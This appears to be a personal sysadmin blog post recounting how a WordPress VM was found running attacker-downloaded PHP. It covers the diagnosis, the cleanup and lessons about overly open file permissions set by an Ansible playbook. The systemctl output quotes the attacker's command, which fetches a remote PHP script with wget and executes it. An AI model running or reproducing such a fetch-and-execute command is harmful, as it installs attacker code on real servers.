Background
I have a few spare VMs running in the cloud, waiting to be purposed. These VMs are provisioned using Ansible but are not in production use. One of them hosts a WordPress site using basic LAMP stack. The only ports open to the world are SSH and HTTP/HTTPS. I should add that the sshd
is configured to use key authentication only, as a sane person would do.
This particular VM runs Debian 11 and has 1 GB of RAM. It serves the sample page came with WordPress, with little to no configuration other than WP 2FA
and W3 Total Cache
plug-ins.
How I found out
I occasionally go to the website url to check if everything is working. Strangely enough, one day, the website was unreachable. I tried to ssh into the VM and the connection timed out. As a last resort, I went to the cloud provider's dashboard and rebooted the VM. As a side note, I uninstalled all diagnostics agent software pre-installed by the cloud provider just to keep the tiny VM lean; I could not monitor the VM in the dashboard as a result.
After the VM came back from reboot, the website started to show up and I could ssh in. Everything seemed to be functional again. However, it didn't last long until the VM locked up again. That is, a few hours later when I checked in, same things happened all over again.
Investigation
After a few more reboots, I decided to investigate the root cause of this strange behaviour. I highly doubted that the website was too popular: it's just a blank site with almost zero traffic. The apache configuration is kept as default; php-fpm configuration are tuned to be on the conservative side with very few workers. I started a bench test from another VM using apache2-utils
package:
~$ ab -c30 -t30 'https://example.com/?cat=1'
This commands spins 30 dynamic connections from the other VM to stress test the php processing. As expected, it handles the test just fine, without any significant RAM usage.
As I dug deeper into the process tree, it didn't take me long to find out that the memory was slowing being eaten by php processes. It happened gradually over the course of a few hours, until all memory was consumed by php-fpm and OOM killer finally kicked in. A quick systemctl status -l php7.4-fpm.service
gives the following info:
● php7.4-fpm.service - The PHP 7.4 FastCGI Process Manager
Loaded: loaded (/lib/systemd/system/php7.4-fpm.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2022-03-06 23:11:47 EST; 1h 13min ago
Docs: man:php-fpm7.4(8)
Process: 650 ExecStartPost=/usr/lib/php/php-fpm-socket-helper install /run/php/php-fpm.sock /etc/php/7.4/fpm/pool.d/www.conf 74 (code=exited, s>
Main PID: 482 (php-fpm7.4)
Status: "Processes active: 2, idle: 14, Requests: 166, slow: 0, Traffic: 0req/sec"
Tasks: 75 (limit: 1128)
Memory: 773.4M
CPU: 14min 29.690s
CGroup: /system.slice/php7.4-fpm.service
├─ 482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
├─ 649 php-fpm: pool www
├─ 750 php-fpm: pool www
├─ 753 php-fpm: pool www
├─ 768 php-fpm: pool www
├─ 56725 php-fpm: pool www
├─ 56736 php-fpm: pool www
├─ 56737 php-fpm: pool www
├─ 92508 php-fpm: pool www
├─ 92528 php-fpm: pool www
├─ 92529 php-fpm: pool www
├─ 92587 php-fpm: pool www
├─ 98783 sh -c wget http://32868.port0.org/st/get_xleet.txt -O inc.class.xleet.php; php inc.class.xleet.php
├─ 98848 php inc.class.xleet.php
├─107565 sh -c php inc.class.xleet.ph
The last three processes immediately gave me a chill in the back. Why is it downloading and executing a php script? It is so bad.
A quick ls -lA
on the document root:
total 344
-rw-r--r-- 1 www-data www-data 8197 Mar 7 15:21 .htaccess
-rwxr-xr-x 1 www-data www-data 2067 Feb 21 20:19 3index.php
-rw-r--r-- 1 www-data www-data 362 Feb 16 11:25 accesson.php
-rw-r--r-- 1 www-data www-data 16090 Mar 7 16:18 angry.txt
drwxr-xr-x 3 www-data www-data 4096 Feb 22 09:36 assets
-rw-r--r-- 1 www-data www-data 1194 Mar 7 16:18 inc.class.xleet.php
-rwxr-xr-x 1 www-data www-data 405 Feb 22 19:35 index.php
-rwxr-xr-x 1 www-data www-data 19915 Mar 7 15:32 license.txt
-rw-r--r-- 1 www-data www-data 12484 Mar 7 16:18 list.txt
-rwxr-xr-x 1 www-data www-data 2012 Nov 10 09:31 old-index.php
-rw-r--r-- 1 www-data www-data 29 Feb 21 20:19 on.php
-rwxr-xr-x 1 www-data www-data 7437 Mar 7 15:32 readme.html
-rwxr-xr-x 1 www-data www-data 556 Oct 29 23:53 robots.txt
-rw-r--r-- 1 www-data www-data 10445 Mar 7 16:18 roll.txt
-rwxr-xr-x 1 www-data www-data 16290 Oct 29 23:51 store.php
-rw-r--r-- 1 www-data www-data 1219 Feb 22 19:35 unzip.php
-rwxr-xr-x 1 www-data www-data 2094 Nov 10 10:21 wikindex.php
drwxr-xr-x 8 www-data www-data 4096 Oct 29 16:10 wordpress
-rwxr-xr-x 1 www-data www-data 7165 Jan 20 2021 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Dec 31 1969 wp-admin
-rwxr-xr-x 1 www-data www-data 7246 Nov 10 09:31 wp-admin.php
-rwxr-xr-x 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rwxr-xr-x 1 www-data www-data 2338 Feb 1 12:35 wp-comments-post.php
-rwxr-xr-x 1 www-data www-data 3001 Feb 1 12:35 wp-config-sample.php
-rwxr-xr-x 1 www-data www-data 3383 Sep 15 22:08 wp-config.php
drwxr-xr-x 10 www-data www-data 4096 Mar 7 15:33 wp-content
-rwxr-xr-x 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-xr-x 26 www-data www-data 12288 Feb 1 12:35 wp-includes
-rwxr-xr-x 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rwxr-xr-x 1 www-data www-data 3900 May 15 2021 wp-load.php
-rwxr-xr-x 1 www-data www-data 47916 Feb 1 12:35 wp-login.php
-rwxr-xr-x 1 www-data www-data 8582 Feb 1 12:35 wp-mail.php
-rwxr-xr-x 1 www-data www-data 23025 Feb 1 12:35 wp-settings.php
-rwxr-xr-x 1 www-data www-data 31959 Feb 1 12:35 wp-signup.php
-rwxr-xr-x 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rwxr-xr-x 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
Clearly there are some unknown files being created (like angry.txt
) and the BIG RED ALERT inc.class.xleet.php
. I tried to delete those files and they kept popping up. I also noticed the weird permission in the document root, 755 seems to be too open. However, no time to think! I quickly removed the document root entirely and went on to check system logs to see if there is any bigger problem. Luckily I didn't find any evidence that the VM is compromised.
Back to WordPress, I downloaded a new installer and the default permission is conservative (644 for the most part). Extracted and started serving, the php scripts didn't make a come back.
Postmortem
I am not an expert in security but this is serious enough for me to reflect and make a lesson. The most likely scenario is that file permission for document root is too open. Either the www:data user or php-fpm process is compromised as a result.
It was ultimately due to a mis-configuration in my Ansible playbook, in which it extracts the WordPress tar ball and reset the permission to 755. Thank goodness this is the only affected machine, as other WordPress sites that I administer are setup by hand.
Lastly, I removed this VM entirely as a precaution.
Takeaways
There are three lessons I learned:
- When something strange happens, take it seriously and investigate; it's a sysadmin's responsibility
- Don't mess with default permission for no obvious reasons
- Examine the automation code carefully before pushing; convenience can sometimes be a double edge sword